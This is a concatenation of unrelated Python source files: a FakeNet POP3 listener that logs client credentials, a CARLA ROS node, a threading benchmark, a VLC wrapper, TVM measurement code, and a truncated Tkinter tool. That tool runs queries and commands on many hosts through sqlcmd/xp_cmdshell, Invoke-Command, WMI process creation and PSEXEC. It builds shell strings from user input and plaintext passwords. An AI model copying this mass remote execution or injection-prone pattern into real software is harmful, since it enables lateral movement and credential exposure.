import sys
import os
import threading
import SocketServer
import ssl
import socket
from . import *
EMAIL = """From: "Bob Example" <bob@example.org>
To: Alice Example <alice@example.com>
Cc: theboss@example.com
Date: Tue, 15 January 2008 16:02:43 -0500
Subject: Test message
Hello Alice.
This is a test message with 5 header fields and 4 lines in the message body.
Your friend,
Bob\r\n"""
class POPListener(object):
# Once the TCP connection has been established, the POP server initiates
# the conversation with +OK message. However, if the client connects
# to a port that is not 110, there is no way for the proxy to know that
# POP is the protocol until the client sends a message.
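    # For example (hypothetical values): the payload 'USER alice' arriving on port
    # 2110 scores 0 (wrong port) + 2 (command match) = 2, while the same payload on
    # port 110 scores 1 + 2 = 3; the higher the score, the more likely this listener
    # is chosen to handle the stream.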
def taste(self, data, dport):
commands = [ 'QUIT', 'STAT', 'LIST', 'RETR', 'DELE', 'NOOP', 'RSET',
'TOP', 'UIDL', 'USER', 'PASS', 'APOP' ]
confidence = 1 if dport == 110 else 0
data = data.lstrip()
for command in commands:
if data.startswith(command):
confidence += 2
return confidence
def __init__(self,
config,
name='POPListener',
logging_level=logging.INFO,
):
self.logger = logging.getLogger(name)
self.logger.setLevel(logging_level)
self.config = config
self.name = name
self.local_ip = '0.0.0.0'
self.server = None
self.name = 'POP'
self.port = self.config.get('port', 110)
self.logger.info('Starting...')
self.logger.debug('Initialized with config:')
for key, value in config.iteritems():
self.logger.debug(' %10s: %s', key, value)
def start(self):
self.logger.debug('Starting...')
self.server = ThreadedTCPServer((self.local_ip, int(self.config['port'])), ThreadedTCPRequestHandler)
if self.config.get('usessl') == 'Yes':
self.logger.debug('Using SSL socket')
keyfile_path = 'listeners/ssl_utils/privkey.pem'
keyfile_path = ListenerBase.abs_config_path(keyfile_path)
if keyfile_path is None:
self.logger.error('Could not locate %s', keyfile_path)
sys.exit(1)
certfile_path = 'listeners/ssl_utils/server.pem'
certfile_path = ListenerBase.abs_config_path(certfile_path)
if certfile_path is None:
self.logger.error('Could not locate %s', certfile_path)
sys.exit(1)
            self.server.socket = ssl.wrap_socket(self.server.socket, keyfile=keyfile_path, certfile=certfile_path, server_side=True, ciphers='RSA')
self.server.logger = self.logger
self.server.config = self.config
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
self.logger.info('Stopping...')
if self.server:
self.server.shutdown()
self.server.server_close()
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
# Timeout connection to prevent hanging
self.request.settimeout(int(self.server.config.get('timeout', 10)))
try:
self.request.sendall("+OK FakeNet POP3 Server Ready\r\n")
while True:
data = self.request.recv(1024)
if not data:
break
elif len(data) > 0:
for line in data.split("\r\n"):
if line and len(line) > 0:
if ' ' in line:
cmd, params = line.split(' ', 1)
else:
cmd, params = line, ''
handler = getattr(self, 'pop_%s' % (cmd.upper()), self.pop_DEFAULT)
handler(cmd, params)
except socket.timeout:
self.server.logger.warning('Connection timeout')
except socket.error as msg:
self.server.logger.error('Error: %s', msg.strerror or msg)
except Exception, e:
self.server.logger.error('Error: %s', e)
def pop_DEFAULT(self, cmd, params):
self.server.logger.info('Client issued an unknown command %s %s', cmd, params)
self.request.sendall("-ERR Unknown command\r\n")
def pop_APOP(self, cmd, params):
if ' ' in params:
mailbox_name, digest = params.split(' ', 1)
self.server.logger.info('Client requests access to mailbox %s', mailbox_name)
self.request.sendall("+OK %s's maildrop has 2 messages (320 octets)\r\n" % mailbox_name)
else:
self.server.logger.info('Client sent invalid APOP command: APOP %s', params)
self.request.sendall("-ERR\r\n")
def pop_RPOP(self, cmd, params):
mailbox_name = params
self.server.logger.info('Client requests access to mailbox %s', mailbox_name)
self.request.sendall("+OK %s's maildrop has 2 messages (320 octets)\r\n" % mailbox_name)
def pop_USER(self, cmd, params):
self.server.logger.info('Client user: %s', params)
self.request.sendall("+OK User accepted\r\n")
def pop_PASS(self, cmd, params):
self.server.logger.info('Client password: %s', params)
self.request.sendall("+OK Pass accepted\r\n")
def pop_STAT(self, cmd, params):
self.request.sendall("+OK 2 320\r\n")
def pop_LIST(self, cmd, params):
# List all messages
if params == '':
self.request.sendall("+OK 2 messages (320 octets)\r\n")
self.request.sendall("1 120\r\n")
self.request.sendall("2 200\r\n")
self.request.sendall(".\r\n")
# List individual message
else:
self.request.sendall("+OK %d 200\r\n" % params)
self.request.sendall(".\r\n")
def pop_RETR(self, cmd, params):
self.server.logger.info('Client requests message %s', params)
self.request.sendall("+OK 120 octets\r\n")
self.request.sendall(EMAIL + "\r\n")
self.request.sendall(".\r\n")
def pop_DELE(self, cmd, params):
self.server.logger.info('Client requests message %s to be deleted', params)
self.request.sendall("+OK message %s deleted\r\n", params)
def pop_NOOP(self, cmd, params):
self.request.sendall("+OK\r\n")
def pop_RSET(self, cmd, params):
self.request.sendall("+OK maildrop has 2 messages (320 octets)\r\n")
def pop_TOP(self, cmd, params):
self.request.sendall("+OK\r\n")
self.request.sendall("1 120\r\n")
self.request.sendall("2 200\r\n")
self.request.sendall(".\r\n")
def pop_UIDL(self, cmd, params):
if params == '':
self.request.sendall("+OK\r\n")
self.request.sendall("1 whqtswO00WBw418f9t5JxYwZa\r\n")
self.request.sendall("2 QhdPYR:00WBw1Ph7x7a\r\n")
self.request.sendall(".\r\n")
else:
self.request.sendall("+OK %s QhdPYR:00WBw1Ph7x7\r\n", params)
def pop_QUIT(self, cmd, params):
self.request.sendall("+OK FakeNet POP3 server signing off\r\n")
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
###############################################################################
# Testing code
def test(config):
import poplib
logger = logging.getLogger('POPListenerTest')
server = poplib.POP3_SSL('localhost', config.get('port', 110))
logger.info('Authenticating.')
server.user('username')
server.pass_('password')
logger.info('Listing and retrieving messages.')
print server.list()
print server.retr(1)
server.quit()
def main():
logging.basicConfig(format='%(asctime)s [%(name)15s] %(message)s', datefmt='%m/%d/%y %I:%M:%S %p', level=logging.DEBUG)
config = {'port': '110', 'usessl': 'Yes', 'timeout': 30 }
listener = POPListener(config)
listener.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
###########################################################################
# Run tests
test(config)
if __name__ == '__main__':
main()
|
carla_ros_scenario_runner_node.py
|
#!/usr/bin/env python
#
# Copyright (c) 2020 Intel Corporation.
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Execute scenarios via ros service
Internally, the CARLA scenario runner is executed
"""
import sys
import os
try:
import queue
except ImportError:
import Queue as queue
from carla_ros_scenario_runner_types.srv import ExecuteScenario
from carla_ros_scenario_runner_types.msg import CarlaScenarioRunnerStatus
from carla_ros_scenario_runner.application_runner import ApplicationStatus # pylint: disable=relative-import
from carla_ros_scenario_runner.scenario_runner_runner import ScenarioRunnerRunner # pylint: disable=relative-import
from ros_compatibility import (
CompatibleNode,
QoSProfile,
ros_ok,
ros_init,
get_service_response,
ros_shutdown,
loginfo,
ROS_VERSION)
# Check Python dependencies of scenario runner
try:
import carla # pylint: disable=unused-import
except ImportError:
print("ERROR: CARLA Python Egg not available. Please add \
<CARLA_DIR>/PythonAPI/carla/dist/carla-<CARLA_VERSION>-\
py<PYTHON_VERSION>-linux-x86_64.egg to your PYTHONPATH.")
sys.exit(1)
try:
from agents.navigation.local_planner import LocalPlanner # pylint: disable=unused-import
except ImportError:
print("ERROR: CARLA Python Agents not available. \
Please add <CARLA_DIR>/PythonAPI/carla to your PYTHONPATH.")
sys.exit(1)
if ROS_VERSION == 2:
import threading
class CarlaRosScenarioRunner(CompatibleNode):
"""
Execute scenarios via ros service
"""
def __init__(self):
"""
Constructor
"""
super(CarlaRosScenarioRunner, self).__init__('carla_ros_scenario_runner')
role_name = self.get_param("role_name", "ego_vehicle")
scenario_runner_path = self.get_param("scenario_runner_path", "")
wait_for_ego = self.get_param("wait_for_ego", "True")
host = self.get_param("host", "localhost")
port = self.get_param("port", 2000)
self._status_publisher = self.new_publisher(
CarlaScenarioRunnerStatus, "/scenario_runner/status",
qos_profile=QoSProfile(depth=1, durability=1))
self.scenario_runner_status_updated(ApplicationStatus.STOPPED)
self._scenario_runner = ScenarioRunnerRunner(
scenario_runner_path,
host,
port,
wait_for_ego,
self.scenario_runner_status_updated,
self.scenario_runner_log)
self._request_queue = queue.Queue()
self._execute_scenario_service = self.new_service(
ExecuteScenario, '/scenario_runner/execute_scenario', self.execute_scenario)
def scenario_runner_log(self, log): # pylint: disable=no-self-use
"""
Callback for application logs
"""
self.logwarn("[SC]{}".format(log))
def scenario_runner_status_updated(self, status):
"""
Executed from application runner whenever the status changed
"""
self.loginfo("Status updated to {}".format(status))
val = CarlaScenarioRunnerStatus.STOPPED
if status == ApplicationStatus.STOPPED:
val = CarlaScenarioRunnerStatus.STOPPED
elif status == ApplicationStatus.STARTING:
val = CarlaScenarioRunnerStatus.STARTING
elif status == ApplicationStatus.RUNNING:
val = CarlaScenarioRunnerStatus.RUNNING
elif status == ApplicationStatus.SHUTTINGDOWN:
val = CarlaScenarioRunnerStatus.SHUTTINGDOWN
else:
val = CarlaScenarioRunnerStatus.ERROR
status = CarlaScenarioRunnerStatus()
status.status = val
self._status_publisher.publish(status)
def execute_scenario(self, req, response=None):
"""
Execute a scenario
"""
self.loginfo("Scenario Execution requested...")
response = get_service_response(ExecuteScenario)
response.result = True
if not os.path.isfile(req.scenario.scenario_file):
self.logwarn("Requested scenario file not existing {}".format(
req.scenario.scenario_file))
response.result = False
else:
self._request_queue.put(req.scenario)
return response
def run(self):
"""
Control loop
:return:
"""
current_req = None
while ros_ok():
if current_req:
if self._scenario_runner.is_running():
self.loginfo("Scenario Runner currently running. Shutting down.")
self._scenario_runner.shutdown()
self.loginfo("Scenario Runner stopped.")
self.loginfo("Executing scenario {}...".format(current_req.name))
# execute scenario
scenario_executed = self._scenario_runner.execute_scenario(
current_req.scenario_file)
if not scenario_executed:
self.logwarn("Unable to execute scenario.")
current_req = None
else:
try:
current_req = self._request_queue.get(block=True, timeout=0.5)
except queue.Empty:
# no new request
pass
if self._scenario_runner.is_running():
self.loginfo("Scenario Runner currently running. Shutting down.")
self._scenario_runner.shutdown()
def main(args=None):
"""
main function
:return:
"""
ros_init(args)
scenario_runner = CarlaRosScenarioRunner()
if ROS_VERSION == 2:
spin_thread = threading.Thread(target=scenario_runner.spin, daemon=True)
spin_thread.start()
try:
scenario_runner.run()
except KeyboardInterrupt:
loginfo("User requested shut down.")
finally:
if scenario_runner._scenario_runner.is_running():
scenario_runner.loginfo("Scenario Runner still running. Shutting down.")
scenario_runner._scenario_runner.shutdown()
del scenario_runner
ros_shutdown()
if ROS_VERSION == 2:
spin_thread.join()
if __name__ == "__main__":
main()
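# Hedged usage note (not part of the original file; the service and message layout are
# inferred only from the fields used above: scenario.name, scenario.scenario_file and
# response.result). With ROS 1 tooling, triggering a scenario might look roughly like:
#   rosservice call /scenario_runner/execute_scenario \
#     "scenario: {name: 'MyScenario', scenario_file: '/path/to/my_scenario.xosc'}"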
|
multi_thread.py
|
import time
from threading import Thread
CONTADOR = 50000000
# CPU-bound countdown used to show that, under CPython's GIL, splitting the work
# across two threads does not execute Python bytecode in parallel.
def contagem_regressiva(n):
    while n > 0:
        n -= 1
t1 = Thread(target=contagem_regressiva, args=(CONTADOR//2,))
t2 = Thread(target=contagem_regressiva, args=(CONTADOR//2,))
inicio = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
fim = time.time()
print(f'Tempo em segundos - {fim - inicio}')
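# --- Hedged addition (not in the original benchmark): the same total count on a
# single thread, for comparison. Under CPython's GIL it typically finishes in about
# the same time or faster than the two-thread version above.
inicio = time.time()
contagem_regressiva(CONTADOR)
fim = time.time()
print(f'Tempo em segundos (1 thread) - {fim - inicio}')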
|
vlcoutput.py
|
""" allows playing of audio media files via the VLC command line """
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import subprocess
import threading
_MACOSX_VLC_PATH = '/Applications/VLC.app/Contents/MacOS/VLC'
_VLC_PARAMS = ['-I', 'rc', '--play-and-exit']
_DEVNULL = open(os.devnull, 'w')
class VlcOutput(object):
""" allows playing of audio media files via the VLC command line """
def __init__(self, config):
self.playing = False
self._current_process = None
self._play_interrupted = threading.Event()
self._process_lock = threading.Lock()
self._on_finish_cb = None
if 'output.vlc.path' in config:
self._vlc_path = config['output.vlc.path']
elif os.path.isfile(_MACOSX_VLC_PATH):
self._vlc_path = _MACOSX_VLC_PATH
else:
raise ValueError('Failed to locate path to VLC, ' +
'set output.vlc.path')
def play(self, audio_url, on_finish_cb=None):
""" starts playing the audio file and immediately returns """
if self.playing or self._current_process:
self.stop()
vlc_cmd = [self._vlc_path] + _VLC_PARAMS + [audio_url]
vlc_process = subprocess.Popen(
vlc_cmd, stdout=_DEVNULL, stderr=_DEVNULL)
self._current_process = vlc_process
self._play_interrupted.clear()
self._on_finish_cb = on_finish_cb
self.playing = True
vlc_exit_thread = threading.Thread(
target=self._wait_for_vlc_exit)
vlc_exit_thread.start()
def blocking_play(self, audio_url):
""" plays the audio file and only returns when complete """
self.play(audio_url)
self._current_process.wait()
def stop(self):
""" terminates any current vlc process """
if self.playing and self._current_process:
with self._process_lock:
old_process = self._current_process
self._current_process = None
self.playing = False
self._play_interrupted.set()
old_process.terminate()
    def _wait_for_vlc_exit(self):
        while self.playing:
            # stop() may clear _current_process from another thread, so take a
            # local reference before polling it
            process = self._current_process
            if process is None or process.poll() is not None:
                break
            if self._play_interrupted.wait(0.1):
                break
with self._process_lock:
self._current_process = None
self.playing = False
if self._on_finish_cb:
self._on_finish_cb()
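# --- Hedged usage sketch (not part of the original module). Both the VLC path and
# the media file below are placeholder assumptions; adjust them before running.
def _example_play(vlc_path='/usr/bin/vlc', media='sample.mp3'):
    def on_finish():
        # invoked from the exit-watcher thread once VLC terminates
        pass
    player = VlcOutput({'output.vlc.path': vlc_path})
    player.play(media, on_finish_cb=on_finish)
    # or, to block until playback completes:
    # player.blocking_play(media)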
|
measure.py
|
import tvm
import os
import sys
import shutil
import tvm._ffi
import numpy as np
import random
import multiprocessing
import multiprocessing.pool
import psutil
import signal
import queue
from pebble import concurrent
from concurrent.futures import TimeoutError
from pebble import ProcessPool, ProcessExpired
from ..utils import to_tuple, ERROR
from tvm import tg
from tvm import auto_tensorize as at
GLOBAL_BUILD_ARGS = None
measure_card_id = 0
measure_number = 10
measure_timeout = 10
measure_parallel = multiprocessing.cpu_count()
class EvaluationContext(object):
def __init__(self):
self.task_queue = multiprocessing.Queue()
self.result_queue = multiprocessing.Queue()
self.stop = False
self.dir_name = "evaluate_pool"
self.file_name = "to_evaluate"
self.file_path = os.path.join(self.dir_name, self.file_name)
if not (os.path.exists(self.dir_name) and os.path.isdir(self.dir_name)):
os.mkdir(self.dir_name)
elif not (len(os.listdir(self.dir_name)) == 0):
shutil.rmtree(self.dir_name)
os.mkdir(self.dir_name)
GLOBAL_EVAL_CTX = EvaluationContext()
class TensorizeContext(object):
def __init__(self):
self.task_queue = multiprocessing.Queue()
self.result_queue = multiprocessing.Queue()
self.stop = False
GLOBAL_TENSORIZE_CTX = TensorizeContext()
def set_measure_card_id(new_id):
global measure_card_id
measure_card_id = new_id
def set_meaure_number(new_number):
global measure_number
measure_number = new_number
def set_measure_timeout(new_timeout):
global measure_timeout
measure_timeout = new_timeout
def set_measure_parallel(new_parallel):
global measure_parallel
measure_parallel = new_parallel
class NoDaemonProcess(multiprocessing.Process):
@property
def daemon(self):
return False
@daemon.setter
def daemon(self, value):
pass
class NoDaemonContext(type(multiprocessing.get_context())):
Process = NoDaemonProcess
class NoDaemonPool(multiprocessing.pool.Pool):
"""A no daemon pool version of multiprocessing.Pool.
This allows us to start new processings inside the worker function"""
def __init__(self, *args, **kwargs):
kwargs['context'] = NoDaemonContext()
super().__init__(*args, **kwargs)
def __reduce__(self):
pass
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
"""kill all child processes recursively"""
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
return
children = parent.children(recursive=True)
for process in children:
try:
process.send_signal(sig)
except psutil.NoSuchProcess:
return
def call_func_with_timeout(timeout, func, args=(), kwargs=None):
"""Call a function with timeout"""
def func_wrapper(que):
if kwargs:
que.put(func(*args, **kwargs))
else:
que.put(func(*args))
que = multiprocessing.Queue(2)
process = multiprocessing.Process(target=func_wrapper, args=(que,))
process.start()
process.join(timeout)
try:
res = que.get(block=False)
except queue.Empty:
res = TimeoutError()
# clean queue and process
kill_child_processes(process.pid)
process.terminate()
process.join()
que.close()
que.join_thread()
del process
del que
return res
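# --- Hedged usage sketch (not part of the original file) for call_func_with_timeout:
# run a 5-second sleep with a 2-second budget; the child process is killed and a
# TimeoutError instance is returned in place of a result.
def _example_call_with_timeout():
    import time
    res = call_func_with_timeout(2, time.sleep, args=(5,))
    return isinstance(res, TimeoutError)  # expected: True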
def evaluate_function(sch, tensors, target):
arrays = []
ctx = tvm.context(target.kind, measure_card_id)
for t in tensors:
ary = tvm.nd.array(np.random.uniform(-1, 1, to_tuple(t.shape)).astype(t.dtype))
arrays.append(ary)
try:
print("check target:", target)
print("check context:", ctx.exist)
func = tvm.build(sch, tensors, target)
time_evaluator = func.time_evaluator(func.entry_name, ctx, number=measure_number)
except Exception as e:
print(e)
return e
return time_evaluator(*arrays).mean * 1e3
def measure_function(index, q=None):
global GLOBAL_BUILD_ARGS
if GLOBAL_BUILD_ARGS is None:
raise RuntimeError("No build arguments found!")
schedules, tensors, target = GLOBAL_BUILD_ARGS
print("check context outer:", tvm.context(target.kind, 0).exist)
sch = schedules[index]
measure = call_func_with_timeout(measure_timeout, evaluate_function, args=(sch, tensors, target))
    if isinstance(measure, TimeoutError):
        ret = float("inf")
    elif isinstance(measure, Exception):
        ret = float("inf")
    else:
        ret = measure
if q is not None:
q.put(ret)
return ret
def measure_multi_function(number):
processes = []
ques = []
res = []
for i in range(number):
q = multiprocessing.Queue()
p = multiprocessing.Process(target=measure_function, args=(i, q))
p.start()
processes.append(p)
ques.append(q)
for p in processes:
p.join()
for q in ques:
res.append(q.get())
return res
# @tvm._ffi.register_func("tg.autoschedule.judge_schedule")
def judge_schedule(schedules, tensors, target, gflop, policy):
print("check context outer outer:", tvm.context(target.kind, 0).exist)
if policy == "profile":
global GLOBAL_BUILD_ARGS
GLOBAL_BUILD_ARGS = (schedules, tensors, target)
pool = NoDaemonPool(measure_parallel)
res = pool.map(measure_function, range(len(schedules)))
pool.terminate()
pool.join()
del pool
# res = measure_multi_function(len(schedules))
ret = []
for r in res:
if r == float("inf"):
ret.append(0.0)
elif abs(r) < 1e-5:
ret.append(0.0)
else:
ret.append(gflop / r)
return ret
elif policy == "model":
sys.exit("Not implemented policy: model")
else:
sys.exit("No support for policy: %s" % policy)
@tvm._ffi.register_func("tg.runtime.evaluate_performance")
def evaluate_performance(modules, name, tensors):
global GLOBAL_EVAL_CTX
file_path = GLOBAL_EVAL_CTX.file_path
for i, module in enumerate(modules):
module.export_library(file_path + "_" + str(i) + ".so")
tensor_ctx = []
for t in tensors:
tensor_ctx.append({"shape": to_tuple(t.shape), "dtype": str(t.dtype)})
GLOBAL_EVAL_CTX.task_queue.put({"name": name, "tensor_ctx": tuple(tensor_ctx), "number": len(modules)})
results = GLOBAL_EVAL_CTX.result_queue.get()
for i in range(len(modules)):
os.remove(file_path + "_" + str(i) + ".so")
print("measure:", results, flush=True)
return results
def start_evaluate():
global GLOBAL_EVAL_CTX
GLOBAL_EVAL_CTX.stop = False
def stop_evaluate():
global GLOBAL_EVAL_CTX
GLOBAL_EVAL_CTX.stop = True
GLOBAL_EVAL_CTX.task_queue.put(-1)
# @concurrent.process(timeout=10)
def _evaluate(args):
idx, target, dev_id, name, tensor_ctx = args
global GLOBAL_EVAL_CTX
file_path = GLOBAL_EVAL_CTX.file_path
arrays = []
ctx = tvm.context(target, dev_id)
for t_ctx in tensor_ctx:
ary = tvm.nd.array(np.random.uniform(-1, 1, t_ctx["shape"]).astype(t_ctx["dtype"]), ctx)
arrays.append(ary)
func = tvm.runtime.load_module(file_path + "_" + str(idx) + ".so")
time_evaluator = func.time_evaluator(name, ctx, number=5)
result = time_evaluator(*arrays).mean * 1e3
return result
@concurrent.process(daemon=False)
def evaluate_function_for(target, dev_id, timeout=10):
global GLOBAL_EVAL_CTX
while not GLOBAL_EVAL_CTX.stop:
if not GLOBAL_EVAL_CTX.task_queue.empty():
name_tensor_ctx = GLOBAL_EVAL_CTX.task_queue.get()
if isinstance(name_tensor_ctx, int) and name_tensor_ctx == -1:
break
name = name_tensor_ctx["name"]
tensor_ctx = name_tensor_ctx["tensor_ctx"]
number = name_tensor_ctx["number"]
with ProcessPool() as pool:
args = []
for i in range(number):
args.append((i, target, dev_id, name, tensor_ctx))
future = pool.map(_evaluate, args, timeout=timeout)
iterator = future.result()
results = []
while True:
try:
result = next(iterator)
except StopIteration:
break
except Exception as error:
# print("Exception!", type(error), str(error), flush=True)
result = -1.0
results.append(result)
GLOBAL_EVAL_CTX.result_queue.put(results)
return 0
def _auto_tensorize_cuda(args):
sch, tensors, log_file, trials = args
target = "cuda"
measure_opt = at.MeasureOptions(
target=target, timeout=100, number=200, min_repeat_ms=500)
target_dag = at.compute_dag_from_tensors(tensors)
result = at.auto_tensorize(
target_dag, target, log_file, measure_opt, trials=trials, transform_dump=True)
if result.defined():
sch, args = at.get_schedule(result.sch_app, result.params)
return {sch: args}
else:
return {sch: []}
@concurrent.process(daemon=False)
def auto_tensorize_for(timeout=3600):
global GLOBAL_TENSORIZE_CTX
while not GLOBAL_TENSORIZE_CTX.stop:
if not GLOBAL_TENSORIZE_CTX.task_queue.empty():
tensorize_ctx = GLOBAL_TENSORIZE_CTX.task_queue.get()
if isinstance(tensorize_ctx, int) and tensorize_ctx == -1:
break
sch = tensorize_ctx["sch"]
tensors = tensorize_ctx["tensors"]
log_file = tensorize_ctx["log_file"]
trials = tensorize_ctx["trials"]
# with ProcessPool(1) as pool:
args = (sch, tensors, log_file, trials)
# future = pool.map(_auto_tensorize_cuda, args, timeout=timeout)
# iterator = future.result()
# results = []
# while True:
# try:
# result = next(iterator)
# except StopIteration:
# break
# except Exception as error:
# # print("Exception!", type(error), str(error), flush=True)
# result = {sch: []}
# results.append(result)
results = _auto_tensorize_cuda(args)
GLOBAL_TENSORIZE_CTX.result_queue.put(results)
return 0
# @tvm._ffi.register_func("tg.autoschedule.auto_tensorize_cuda")
def auto_tensorize_cuda(sch, tensors, log_file, trials):
global GLOBAL_TENSORIZE_CTX
GLOBAL_TENSORIZE_CTX.task_queue.put(
{"sch": sch, "tensors": tensors, "log_file": log_file, "trials": trials})
results = GLOBAL_TENSORIZE_CTX.result_queue.get()
print("auto_tensorize success!", flush=True)
return results
def start_tensorize():
global GLOBAL_TENSORIZE_CTX
GLOBAL_TENSORIZE_CTX.stop = False
def stop_tensorize():
global GLOBAL_TENSORIZE_CTX
GLOBAL_TENSORIZE_CTX.stop = True
GLOBAL_TENSORIZE_CTX.task_queue.put(-1)
def set_evaluate_performance(func):
tvm._ffi.register_func("tg.runtime.evaluate_performance", func, True)
|
gui1_support.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.18
# in conjunction with Tcl version 8.6
# Nov 11, 2018 03:57:06 PM CET platform: Windows NT
import sys, gui1, subprocess, threading, time, psutil, base64, re
MEMORY_LIMIT_PERCENT=60
CPU_LIMIT_PERCENT=30
thread_limit=10
block=False
run_block=False
first_run=True
No_Cred=False
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
def set_Tk_var():
global wrn
wrn = tk.StringVar()
global combobox
combobox = 'tk.StringVar()'
def main():
global CREATE_NO_WINDOW,block,hosts_parsed,run_block,querry,user,passw,CHECK_PER,sqlcmd_mode,first_run,selection,No_Cred,opts
CREATE_NO_WINDOW = 0x08000000
CHECK_PER=10
Checked=False
if not run_block:
selection=w.TCombobox1.get()
if selection=="sqlcmd":
querry=w.Scrolledtext2.get(0.0,"end").replace('\n', ' ')
elif selection=="Invoke-Command" or selection=="Invoke-WmiMethod":
querry=w.Scrolledtext2.get(0.0,"end").replace('\n', ';')
elif selection=="PSEXEC":
querry=w.Scrolledtext2.get(0.0,"end").replace('\n', ';')
querry=w.Scrolledtext2.get(0.0,"end").replace('powershell', 'powershell -inputformat none')
querry=querry[:-1]
user=w.Entry1.get().replace(' ', '').replace('\n', '')
passw=w.Entry2.get().replace(' ', '').replace('\n', '').encode('base64')
hosts=w.Scrolledtext1.get(0.0,"end").encode("ascii")
opts=w.Entry3.get()
sqlcmd_mode=False
if len(hosts)>0 and len(querry)>0 and "-Querry-" not in querry and "-Hosts-" not in hosts:
if selection=="sqlcmd" and len(passw)>0 and len(user)>0 and "Username" not in user and "Username" not in passw.decode('base64'):
Checked=True
elif selection=="Invoke-Command" or selection=="Invoke-WmiMethod" or selection=="PSEXEC":
Checked=True
No_Cred=False
if len(passw)==0 or len(user)==0 or "Username" in user or "Username" in passw.decode('base64'):
No_Cred=True
if Checked:
first_run=False
run_block=True
w.TProgressbar1['value']=0
w.Scrolledtext3.delete(1.0,"end")
w.Button1.configure(text="Running")
hosts_parsed=hosts.splitlines()
if selection=="sqlcmd" and re.search("xp_cmdshell",querry,re.IGNORECASE):
querry=querry.replace('xp_cmdshell', 'exec xp_cmdshell')
querry=querry.replace('"', '""')
sqlcmd_mode=True
threading.Thread(target=check_system).start()
threading.Thread(target=launcher).start()
def launcher():
global hosts_parsed,iterations,CHECK_PER,block,thread_limit
iterations=0
for line in hosts_parsed:
if len(line)>0:
if block or threading.activeCount()>thread_limit:
while threading.activeCount()>6:
time.sleep(1)
thread = threading.Thread(target=procedure,args=(line.splitlines()))
thread.start()
else:
pass
if iterations%20==0 and iterations!=0 and len(hosts_parsed)!=(iterations+1):
time.sleep(0.2)
iterations+=1
w.TProgressbar1['value']=(float(float(iterations)/float(len(hosts_parsed))))*100
def procedure(dest):
global iterations,hosts_parsed,run_block,querry,user,passw,sqlcmd_mode,selection,No_Cred,opts
try:
if selection=="sqlcmd":
if sqlcmd_mode:
if "Opts.(Default)" in opts or len(opts)<1:
opts="-l 10 -t 30"
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
out = subprocess.check_output("chcp 65001>NUL && @echo ON && sqlcmd -S "+dest+" -U "+user+" -P "+passw.decode('base64')+" -Q "+'"'+querry+'"'+" -s "+'"'+'|'+'"'+
" "+opts+" && exit",shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
if "Opts.(Default)" in opts or len(opts)<1:
opts="-y 32 -Y 32 -l 10 -t 60"
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
out = subprocess.check_output("chcp 65001>NUL && @echo ON && sqlcmd -S "+dest+" -U "+user+" -P "+passw.decode('base64')+" -Q "+'"'+"SET NOCOUNT ON;"+querry+'"'+" -s "+'"'+'|'+'"'+
" "+opts+" && exit",shell=True, bufsize=-1 ,stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
elif selection=="Invoke-Command":
if "Opts.(Default)" in opts or len(opts)<1:
opts=""
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
if No_Cred:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+
"Invoke-Command -ComputerName "+dest+" -ScriptBlock {"+querry+"}"+" "+opts+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+"$Password = '"+passw.decode('base64')+
"';$pass = ConvertTo-SecureString -AsPlainText $Password -Force;$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList "+user+",$pass;"+
"Invoke-Command -ComputerName "+dest+" -Credential $Cred -ScriptBlock {"+querry+"}"+" "+opts+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
elif selection=="Invoke-WmiMethod":
if "Opts.(Default)" in opts or len(opts)<1:
opts=""
w.Entry3.delete(first=0,last=100)
w.Entry3.insert('insert',"Opts.(Default)")
if No_Cred:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+
r"$proc = Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'CMD.EXE /c "+querry+r" > C:\temp\result.txt && exit' -ComputerName '"+dest+
"'"+" "+opts+r";$Process = Get-Process -ID $proc.processid;$Process.WaitForExit();Get-Content \\"+dest+r"\C$\temp\result.txt"+
'"',shell=True, bufsize=-1 , stderr=subprocess.STDOUT, stdin=subprocess.PIPE, close_fds=False, creationflags=CREATE_NO_WINDOW).decode("utf-8")
else:
out = subprocess.check_output("chcp 65001>NUL && powershell -ExecutionPolicy RemoteSigned -Command "+'"'+"$Password ='"+passw.decode('base64')+
r"';$pass = ConvertTo-SecureString -AsPlainText $Password -Force;$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList "+user+",$pass;"+
r"$proc = Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'CMD.EXE /c "+querry+r" > C:\temp\result.txt' -ComputerName '"+dest+
